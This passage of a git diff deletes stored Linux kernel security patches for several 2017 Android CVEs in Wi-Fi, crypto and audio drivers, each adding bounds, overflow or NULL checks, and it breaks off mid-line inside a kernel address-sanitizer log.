-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- }
-
- change_array = ¶ms->change_array[params->results_rxed_so_far];
-- memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+ if ((params->results_rxed_so_far + results->pkt_count) >
-+ results->total_count) {
-+ DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+ *send_evt_bytes = 0;
-+ kfree(params->change_array);
-+ params->change_array = NULL;
-+ return ptr;
-+ }
-+
-+ memcpy(change_array, results->list,
-+ sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- params->results_rxed_so_far += results->pkt_count;
-
- if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- /* allows only supported channel on
- * current reguatory
- */
-+ if (n_nodfs >= num_chans)
-+ break;
-+
- if (channel == (dtoh32(list->element[j])))
- default_chan_list[n_nodfs++] =
- channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
-
-- WL_ERR((">>> PNO Event\n"));
-+ if (!data) {
-+ WL_ERR(("Data is NULL!\n"));
-+ return 0;
-+ }
-
-+ WL_DBG((">>> PNO Event\n"));
- ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
-
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch
deleted file mode 100644
index d1ac526c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From 4b29d0111186ebef75a9af7da8257697386ac4a4 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 25 Jan 2017 11:41:49 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in wlfc reordering
-
-added boundary check not to override allocated buffer
-
-Signed-off-by: Insun Song
-Change-Id: Iad44141ba4e4cd224eda292c05ffe525bf74227d
-Bug: 34203305
----
- drivers/net/wireless/bcmdhd/dhd_wlfc.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_wlfc.c b/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-index 741ebc8642275..3b9cfe85f7635 100644
---- a/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-@@ -2458,7 +2458,7 @@ static void
- _dhd_wlfc_reorderinfo_indicate(uint8 *val, uint8 len, uchar *info_buf, uint *info_len)
- {
- if (info_len) {
-- if (info_buf) {
-+ if (info_buf && (len <= WLHOST_REORDERDATA_TOTLEN)) {
- bcopy(val, info_buf, len);
- *info_len = len;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch
deleted file mode 100644
index bc7e20a9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 3afb019c44d750086f8d5228f8c934da2910d8df Mon Sep 17 00:00:00 2001
-From: gwx419604
-Date: Mon, 20 Mar 2017 15:11:22 +0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- dhd_pno_process_anqpo_result
-
-CVE-2017-0572
-
-added boundary check not to overflow buffer
-especially when input parameters manipulated.
-
-
-Bug: 34198931
-Change-Id: I39d7dc38a597a938d37dbd7bb267a7ff4df93e45
-Signed-off-by: Insun Song
-Signed-off-by: gwx419604
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 21 +++++++++++++++++----
- 1 file changed, 17 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index f3f2a6f2e7aac..ab9bede10e30d 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3631,8 +3631,8 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- u32 bi_length = 0;
- uint8 channel;
- uint32 mem_needed;
--
- struct timespec ts;
-+ wl_event_gas_t *gas_data;
-
- *size = 0;
-
-@@ -3653,9 +3653,22 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- DHD_ERROR(("Invalid bss_info length %d: ignoring\n", bi_length));
- goto exit;
- }
-- if (bi->SSID_len > DOT11_MAX_SSID_LEN) {
-- DHD_ERROR(("Invalid SSID length %d: trimming it to max\n", bi->SSID_len));
-- bi->SSID_len = DOT11_MAX_SSID_LEN;
-+ if ((bi->SSID_len > DOT11_MAX_SSID_LEN)||
-+ (bi->ie_length > (*size - sizeof(wl_bss_info_t))) ||
-+ (bi->ie_offset < sizeof(wl_bss_info_t)) ||
-+ (bi->ie_offset > (sizeof(wl_bss_info_t) + bi->ie_length))){
-+ DHD_ERROR(("%s: tot:%d,SSID:%d,ie_len:%d,ie_off:%d\n",
-+ __FUNCTION__, *size, bi->SSID_len,
-+ bi->ie_length, bi->ie_offset));
-+ return NULL;
-+ }
-+
-+ gas_data = (wl_event_gas_t *)((uint8 *)data + bi->ie_offset + bi->ie_length);
-+
-+ if (gas_data->data_len > (*size - (bi->ie_offset + bi->ie_length))) {
-+ DHD_ERROR(("%s: wrong gas_data_len:%d\n",
-+ __FUNCTION__, gas_data->data_len));
-+ return NULL;
- }
-
- mem_needed = OFFSETOF(wifi_gscan_result_t, ie_data) + bi->ie_length;
diff --git a/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch
deleted file mode 100644
index cd084634..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 3d9f2799fd13d1125ab4b3d74a523bd7f2e566f3 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Tue, 31 Jan 2017 16:18:40 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- wl_android_set_roampref
-
-added boundary check not to override allocated buffer.
-Specially when user input corrupted or manipulated.
-
-Signed-off-by: Insun Song
-Change-Id: Id6196da10111517696eda5f186b1e2dd19f66085
-Bug: 34469904
----
- drivers/net/wireless/bcmdhd/wl_android.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index 46b00bd913835..c415bfcba0f6a 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -936,8 +936,8 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
- uint8 buf[MAX_BUF_SIZE];
- uint8 *pref = buf;
- char *pcmd;
-- int num_ucipher_suites = 0;
-- int num_akm_suites = 0;
-+ uint num_ucipher_suites;
-+ uint num_akm_suites;
- wpa_suite_t ucipher_suites[MAX_NUM_SUITES];
- wpa_suite_t akm_suites[MAX_NUM_SUITES];
- int num_tuples = 0;
-@@ -950,6 +950,10 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
- total_len_left = total_len - strlen(CMD_SET_ROAMPREF) + 1;
-
- num_akm_suites = simple_strtoul(pcmd, NULL, 16);
-+ if (num_akm_suites > MAX_NUM_SUITES) {
-+ WL_ERR(("wrong num_akm_suites:%d.\n", num_akm_suites));
-+ return BCME_ERROR;
-+ }
- /* Increment for number of AKM suites field + space */
- pcmd += 3;
- total_len_left -= 3;
-@@ -975,6 +979,10 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
-
- total_len_left -= (num_akm_suites * WIDTH_AKM_SUITE);
- num_ucipher_suites = simple_strtoul(pcmd, NULL, 16);
-+ if (num_ucipher_suites > MAX_NUM_SUITES) {
-+ WL_ERR(("wrong num_ucipher_suites:%d.\n", num_ucipher_suites));
-+ return BCME_ERROR;
-+ }
- /* Increment for number of cipher suites field + space */
- pcmd += 3;
- total_len_left -= 3;
diff --git a/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch
deleted file mode 100644
index cee6f2f8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From e55ddf68568a33288d76f5e00c93f8157cb9a632 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli
-Date: Fri, 27 Jan 2017 17:14:19 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Fix for arbitrary memory free.
-
-Fix for arbitrary memory free in nexus6p's wifi driver
-function wl_cfgvendor_dbg_get_mem_dump. Current fix
-includes intialize mem_buf to NULL and check if the
-len is valid or not. Also check if buf_len is valid
-or not. If buf_len is not valid then mem_buf will be
-set to NULL.
-
-Signed-off-by: Sudhir Kohalli
-
-Change-Id: Ia98ce18f0437d38d6f6d77033af7477ae12574e3
-Bug: 34624457
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 29 ++++++++++++++++++++++++++---
- 1 file changed, 26 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 9a73de20f1298..1f5152f66ab36 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -2283,7 +2283,7 @@ static int wl_cfgvendor_dbg_get_mem_dump(struct wiphy *wiphy,
- int buf_len = 0;
- void __user *user_buf = NULL;
- const struct nlattr *iter;
-- char *mem_buf;
-+ char *mem_buf = NULL;
- struct sk_buff *skb;
- struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
-
-@@ -2291,10 +2291,33 @@ static int wl_cfgvendor_dbg_get_mem_dump(struct wiphy *wiphy,
- type = nla_type(iter);
- switch (type) {
- case DEBUG_ATTRIBUTE_FW_DUMP_LEN:
-- buf_len = nla_get_u32(iter);
-+ /* Check if the iter is valid and
-+ * buffer length is not already initialized.
-+ */
-+ if ((nla_len(iter) == sizeof(uint32)) &&
-+ !buf_len) {
-+ buf_len = nla_get_u32(iter);
-+ if (buf_len <= 0) {
-+ ret = BCME_ERROR;
-+ goto exit;
-+ }
-+ } else {
-+ ret = BCME_ERROR;
-+ goto exit;
-+ }
- break;
- case DEBUG_ATTRIBUTE_FW_DUMP_DATA:
-- user_buf = (void __user *)(unsigned long) nla_get_u64(iter);
-+ if (nla_len(iter) != sizeof(uint64)) {
-+ WL_ERR(("Invalid len\n"));
-+ ret = BCME_ERROR;
-+ goto exit;
-+ }
-+ user_buf =
-+ (void __user *)(unsigned long)nla_get_u64(iter);
-+ if (!user_buf) {
-+ ret = BCME_ERROR;
-+ goto exit;
-+ }
- break;
- default:
- WL_ERR(("Unknown type: %d\n", type));
diff --git a/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch
deleted file mode 100644
index e034def0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From a4f790c140d9813c3af66a9b367b4568e053278a Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Goswami
-Date: Fri, 23 Dec 2016 13:20:45 +0530
-Subject: qcacld-2.0: Avoid integer overflow in wma_enable_arp_ns_offload
-
-In the function wma_enable_arp_ns_offload(), the len variable is
-defined as signed 32 bit, whereas wmi_buf_alloc() takes unsigned
-16 bit as input also there is no limit on input of
-num_ns_offload_count.
-
-Fix is to define the len variable in wma_enable_arp_ns_offload()
-as unsigned 32 bit. The length input for wmi_buf_alloc() is also
-extended and re-defined as unsigned 32 bit. Add limit check before
-using num_ns_offload_count.
-
-Change-Id: I5063df9551074e964eef67abeb8afcf104e50808
-CRs-Fixed: 1103099
----
- CORE/SERVICES/COMMON/wmi_unified_api.h | 4 ++--
- CORE/SERVICES/WMA/wma.c | 9 +++++++--
- CORE/SERVICES/WMI/wmi_unified.c | 4 ++--
- 3 files changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/SERVICES/COMMON/wmi_unified_api.h b/CORE/SERVICES/COMMON/wmi_unified_api.h
-index cd9f923..2912d47 100644
---- a/CORE/SERVICES/COMMON/wmi_unified_api.h
-+++ b/CORE/SERVICES/COMMON/wmi_unified_api.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -69,7 +69,7 @@ wmi_unified_remove_work(struct wmi_unified* wmi_handle);
- * @return wmi_buf_t.
- */
- wmi_buf_t
--wmi_buf_alloc(wmi_unified_t wmi_handle, u_int16_t len);
-+wmi_buf_alloc(wmi_unified_t wmi_handle, uint32_t len);
-
-
- /**
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index f09c8fd..c802405 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -22719,7 +22719,7 @@ static VOS_STATUS wma_enable_arp_ns_offload(tp_wma_handle wma, tpSirHostOffloadR
- WMI_ARP_OFFLOAD_TUPLE *arp_tuple;
- A_UINT8* buf_ptr;
- wmi_buf_t buf;
-- int32_t len;
-+ uint32_t len;
- u_int8_t vdev_id;
- uint32_t count = 0, num_ns_ext_tuples = 0;
-
-@@ -22740,6 +22740,11 @@ static VOS_STATUS wma_enable_arp_ns_offload(tp_wma_handle wma, tpSirHostOffloadR
- if (!bArpOnly)
- count = pHostOffloadParams->num_ns_offload_count;
-
-+ if (count >= SIR_MAC_NUM_TARGET_IPV6_NS_OFFLOAD_NA) {
-+ vos_mem_free(pHostOffloadParams);
-+ return VOS_STATUS_E_FAILURE;
-+ }
-+
- len = sizeof(WMI_SET_ARP_NS_OFFLOAD_CMD_fixed_param) +
- WMI_TLV_HDR_SIZE + // TLV place holder size for array of NS tuples
- WMI_MAX_NS_OFFLOADS*sizeof(WMI_NS_OFFLOAD_TUPLE) +
-diff --git a/CORE/SERVICES/WMI/wmi_unified.c b/CORE/SERVICES/WMI/wmi_unified.c
-index 463a324..c0663d3 100644
---- a/CORE/SERVICES/WMI/wmi_unified.c
-+++ b/CORE/SERVICES/WMI/wmi_unified.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -131,7 +131,7 @@ uint16_t wmi_get_max_msg_len(wmi_unified_t wmi_handle)
- }
-
- wmi_buf_t
--wmi_buf_alloc(wmi_unified_t wmi_handle, u_int16_t len)
-+wmi_buf_alloc(wmi_unified_t wmi_handle, uint32_t len)
- {
- wmi_buf_t wmi_buf;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch
deleted file mode 100644
index 403119ec..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 2b09507d78b25637df6879cd2ee2031b208b3532 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Thu, 19 Jan 2017 14:59:44 -0800
-Subject: crypto: msm: check integer overflow on total data len in qcedev.c
-
-qcedev_vbuf_ablk_cipher will calculate total data length. It starts
-with the value of "areq->cipher_op_req.byteoffset", which is controlled
-by the user. Make change to check if this total data length has integer
-overflow issue in qcedev_check_cipher_params.
-
-Change-Id: Ice42dca6d47eb8febfe8a34e566c69e4799fab57
-Signed-off-by: Zhen Kong
----
- drivers/crypto/msm/qcedev.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 9ab03209b..a629c62 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1445,6 +1445,15 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- pr_err("%s: Invalid byte offset\n", __func__);
- goto error;
- }
-+ total = req->byteoffset;
-+ for (i = 0; i < req->entries; i++) {
-+ if (total > U32_MAX - req->vbuf.src[i].len) {
-+ pr_err("%s:Integer overflow on total src len\n",
-+ __func__);
-+ goto error;
-+ }
-+ total += req->vbuf.src[i].len;
-+ }
- }
-
- if (req->data_len < req->byteoffset) {
-@@ -1480,7 +1489,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- }
- }
- /* Check for sum of all dst length is equal to data_len */
-- for (i = 0; i < req->entries; i++) {
-+ for (i = 0, total = 0; i < req->entries; i++) {
- if (req->vbuf.dst[i].len >= U32_MAX - total) {
- pr_err("%s: Integer overflow on total req dst vbuf length\n",
- __func__);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch
deleted file mode 100644
index 52c6a22d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b8f70068650a6e6bef0a41de2e30c17087d3a84d Mon Sep 17 00:00:00 2001
-From: Srinivasarao P
-Date: Tue, 14 Feb 2017 13:52:08 +0530
-Subject: defconfig: disable cp_access
-
-cpaccess module gives userspace control over system control
-registers so disable cp_access module.
-
-Change-Id: Ib49412957f91ce65f4350c5c72358b1c53eed43e
-Signed-off-by: Srinivasarao P
----
- arch/arm/configs/msm8916-perf_defconfig | 2 +-
- arch/arm/configs/msm8916_defconfig | 2 +-
- arch/arm64/configs/msm_defconfig | 2 +-
- 3 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/configs/msm8916-perf_defconfig b/arch/arm/configs/msm8916-perf_defconfig
-index 08a43de..94d2321 100644
---- a/arch/arm/configs/msm8916-perf_defconfig
-+++ b/arch/arm/configs/msm8916-perf_defconfig
-@@ -64,7 +64,7 @@ CONFIG_AEABI=y
- CONFIG_BALANCE_ANON_FILE_RECLAIM=y
- CONFIG_HIGHMEM=y
- CONFIG_ENABLE_VMALLOC_SAVING=y
--CONFIG_CP_ACCESS=y
-+# CONFIG_CP_ACCESS is not set
- CONFIG_AUTO_ZRELADDR=y
- CONFIG_ARM_DECOMPRESSOR_LIMIT=0x3200000
- CONFIG_SCHED_FREQ_INPUT=y
-diff --git a/arch/arm/configs/msm8916_defconfig b/arch/arm/configs/msm8916_defconfig
-index b7caf59..30a81e3 100644
---- a/arch/arm/configs/msm8916_defconfig
-+++ b/arch/arm/configs/msm8916_defconfig
-@@ -62,7 +62,7 @@ CONFIG_AEABI=y
- CONFIG_BALANCE_ANON_FILE_RECLAIM=y
- CONFIG_HIGHMEM=y
- CONFIG_ENABLE_VMALLOC_SAVING=y
--CONFIG_CP_ACCESS=y
-+# CONFIG_CP_ACCESS is not set
- CONFIG_AUTO_ZRELADDR=y
- CONFIG_ARM_DECOMPRESSOR_LIMIT=0x3200000
- CONFIG_SCHED_FREQ_INPUT=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 4a26793..d8e8a826 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -528,7 +528,7 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS=y
- CONFIG_SENSORS_SSC=y
--CONFIG_CP_ACCESS64=y
-+# CONFIG_CP_ACCESS64 is not set
- CONFIG_MSM_GLADIATOR_ERP=y
- CONFIG_MSM_BAM_DMUX=y
- CONFIG_MSM_IPC_ROUTER_SMD_XPRT=y
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch
deleted file mode 100644
index e3799be1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 452d2ad331d20b19e8a0768c4b6e7fe1b65abe8f Mon Sep 17 00:00:00 2001
-From: Bruce Levy
-Date: Wed, 27 Jan 2016 17:37:33 -0800
-Subject: defconfig: msm: Disable CONFIG_CP_ACCESS64
-
-Disable the cpaccess64 driver.
-This driver allows user space access to cpu registers.
-With this driver enabled, a CTS test causes the
-system to crash.
-
-CRs-Fixed: 968777
-Change-Id: I3ebe7220c7ca68a25b781c2e836a735d11dcaf08
-Signed-off-by: Bruce Levy
----
- arch/arm64/configs/msm-perf_defconfig | 1 -
- arch/arm64/configs/msm_defconfig | 1 -
- 2 files changed, 2 deletions(-)
-
-diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig
-index fad17d9..37158e6 100644
---- a/arch/arm64/configs/msm-perf_defconfig
-+++ b/arch/arm64/configs/msm-perf_defconfig
-@@ -496,7 +496,6 @@ CONFIG_GPIO_USB_DETECT=y
- CONFIG_MSM_SPMI=y
- CONFIG_MSM_SPMI_PMIC_ARB=y
- CONFIG_MSM_QPNP_INT=y
--CONFIG_CP_ACCESS64=y
- CONFIG_MSM_ADSP_LOADER=y
- CONFIG_MSM_MEMORY_DUMP_V2=y
- CONFIG_MSM_BOOT_STATS=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 6f1e808..80ae314 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -503,7 +503,6 @@ CONFIG_GPIO_USB_DETECT=y
- CONFIG_MSM_SPMI=y
- CONFIG_MSM_SPMI_PMIC_ARB=y
- CONFIG_MSM_QPNP_INT=y
--CONFIG_CP_ACCESS64=y
- CONFIG_MSM_ADSP_LOADER=y
- CONFIG_MSM_MEMORY_DUMP_V2=y
- CONFIG_MSM_BOOT_STATS=y
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch
deleted file mode 100644
index cbd5fda6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From b83b9057d56c057d1dfca79ae197583a83766245 Mon Sep 17 00:00:00 2001
-From: Govind Singh
-Date: Thu, 12 Jan 2017 10:30:25 +0530
-Subject: qcacld-2.0: Do not copy buffer to user-space if diag read fails
-
-ATH diag procfs read is copying read_buffer to user space
-unconditionally, causing kernel heap information leak of
-uninitialized read_buffer if hif diag read fails.
-
-Do not copy buffer to user space if diag read fails to
-avoid information leak to user space.
-
-Change-Id: I5e07cad4f90e5e9b3c461268b8fa3635c3128b9f
-CRs-Fixed: 1104731
----
- CORE/SERVICES/HIF/ath_procfs.c | 11 +++++------
- 1 file changed, 5 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/SERVICES/HIF/ath_procfs.c b/CORE/SERVICES/HIF/ath_procfs.c
-index cfdf97a..d1a34dd 100644
---- a/CORE/SERVICES/HIF/ath_procfs.c
-+++ b/CORE/SERVICES/HIF/ath_procfs.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013, 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013, 2016-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -113,17 +113,16 @@ static ssize_t ath_procfs_diag_read(struct file *file, char __user *buf,
- (A_UINT8 *)read_buffer, count);
- }
-
-+ if (rv)
-+ return -EIO;
-+
- if(copy_to_user(buf, read_buffer, count)) {
- vos_mem_free(read_buffer);
- return -EFAULT;
- } else
- vos_mem_free(read_buffer);
-
-- if (rv == 0) {
-- return count;
-- } else {
-- return -EIO;
-- }
-+ return count;
- }
-
- static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch
deleted file mode 100644
index 9da502d5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From 05bacdc0f9c16c58326a4be9e88afa870cf1024e Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Thu, 9 Feb 2017 16:04:21 -0800
-Subject: [PATCH] ASoC: msm: qdsp6v2: Fix out-of-bounds access in put functions
-
-Add out of bounds check in routing put functions
-for the mux value before accessing the texts
-pointer of soc_enum struct with mux as index.
-
-CRs-fixed: 1097569
-Bug: 33649808
-Change-Id: Ib9ef8d398f0765754b0f79666963fac043b66077
-Signed-off-by: Karthikeyan Mani
----
- sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
- mode change 100755 => 100644 sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-old mode 100755
-new mode 100644
-index 97c914ac35a4a..adbeb77bcb912
---- a/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2272,6 +2272,11 @@ static int msm_routing_ec_ref_rx_put(struct snd_kcontrol *kcontrol,
- struct snd_soc_dapm_update *update = NULL;
- int valid_port = true;
-
-+ if (mux >= e->items) {
-+ pr_err("%s: Invalid mux value %d\n", __func__, mux);
-+ return -EINVAL;
-+ }
-+
- mutex_lock(&routing_lock);
- switch (ucontrol->value.integer.value[0]) {
- case 0:
-@@ -2439,6 +2444,11 @@ static int msm_routing_ext_ec_put(struct snd_kcontrol *kcontrol,
- uint16_t ext_ec_ref_port_id;
- struct snd_soc_dapm_update *update = NULL;
-
-+ if (mux >= e->items) {
-+ pr_err("%s: Invalid mux value %d\n", __func__, mux);
-+ return -EINVAL;
-+ }
-+
- mutex_lock(&routing_lock);
- msm_route_ext_ec_ref = ucontrol->value.integer.value[0];
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch
deleted file mode 100644
index 8e01dbee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch
+++ /dev/null
@@ -1,81 +0,0 @@
-From 6975e2dd5f37de965093ba3a8a08635a77a960f7 Mon Sep 17 00:00:00 2001
-From: David Keitel
-Date: Mon, 20 Apr 2015 15:51:33 -0700
-Subject: bcl: fix allocation for BCL attribute
-
-The size of the BCL attribute is incorrect due to a precedence bug:
-
-This was observed while booting with Kernel Address Sanitizer(KASan) enabled.
-
-=============================================================================
-BUG kmalloc-64 (Tainted: G B ): kasan: bad access detected
------------------------------------------------------------------------------
-
-INFO: Slab 0xffffffbc0661c6e0 objects=64 used=64 fp=0x (null) flags=0x0080
-INFO: Object 0xffffffc0a360bb00 @offset=2816 fp=0xffffffc0a3454728
-
-Bytes b4 ffffffc0a360baf0: 3f 37 9c 1c 00 00 00 00 02 00 02 00 a9 4e ad de ?7...........N..
